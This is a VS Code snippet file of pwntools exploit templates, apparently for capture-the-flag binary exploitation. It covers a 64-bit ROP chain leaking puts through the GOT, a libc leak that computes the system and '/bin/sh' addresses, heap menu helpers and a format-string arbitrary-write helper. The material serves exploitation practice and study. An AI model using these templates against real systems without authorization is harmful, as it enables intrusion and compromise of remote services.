
{
"Basic Pwntools Template": {
"prefix": "pwn-basic",
"body": [
"from pwn import *",
"",
"context.log_level = 'debug'",
"context.arch = '${1:amd64}'",
"",
"LOCAL = True",
"if LOCAL:",
" p = process('./${2:binary}')",
" #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')",
"else:",
" p = remote('${3:ip}', ${4:port})",
" #libc = ELF('./libc.so.6')",
"",
"elf = ELF('./${2:binary}')",
"",
"$0",
"p.interactive()"
]
},
"ROP Chain 64bit": {
"prefix": "pwn-rop64",
"body": [
"puts_plt = elf.plt['puts']",
"puts_got = elf.got['puts']",
"main_addr = elf.symbols['main']",
"",
"pop_rdi = 0x400683 # ROPgadget --binary ./binary --only \"pop|ret\"",
"ret = 0x40028e # stack alignment",
"",
"payload = flat([",
" b'A'*${1:offset},",
" p64(pop_rdi),",
" p64(puts_got),",
" p64(puts_plt),",
" p64(main_addr)",
"])",
"$0"
]
},
"Heap Functions": {
"prefix": "pwn-heap",
"body": [
"def add(size, content):",
" p.sendlineafter('Choice:', '1')",
" p.sendlineafter('Size:', str(size))",
" p.sendafter('Content:', content)",
"",
"def delete(index):",
" p.sendlineafter('Choice:', '2')",
" p.sendlineafter('Index:', str(index))",
"",
"def edit(index, content):",
" p.sendlineafter('Choice:', '3')",
" p.sendlineafter('Index:', str(index))",
" p.sendafter('Content:', content)",
"",
"def show(index):",
" p.sendlineafter('Choice:', '4')",
" p.sendlineafter('Index:', str(index))",
"$0"
]
},
"Libc Leak": {
"prefix": "pwn-libc",
"body": [
"puts_leak = u64(p.recvuntil('\\n', drop=True).ljust(8, b'\\x00'))",
"libc_base = puts_leak - libc.symbols['puts']",
"system_addr = libc_base + libc.symbols['system']",
"binsh_addr = libc_base + next(libc.search(b'/bin/sh'))",
"$0"
]
},
"GDB Debug": {
"prefix": "pwn-gdb",
"body": ["gdb.attach(p, '''", "b *${1:0x400789}", "c", "''')", "$0"]
},
"Format String": {
"prefix": "pwn-fmt",
"body": [
"def write_anywhere(addr, value):",
" payload = fmtstr_payload(${1:offset}, {addr: value})",
" p.sendline(payload)",
"$0"
]
}
}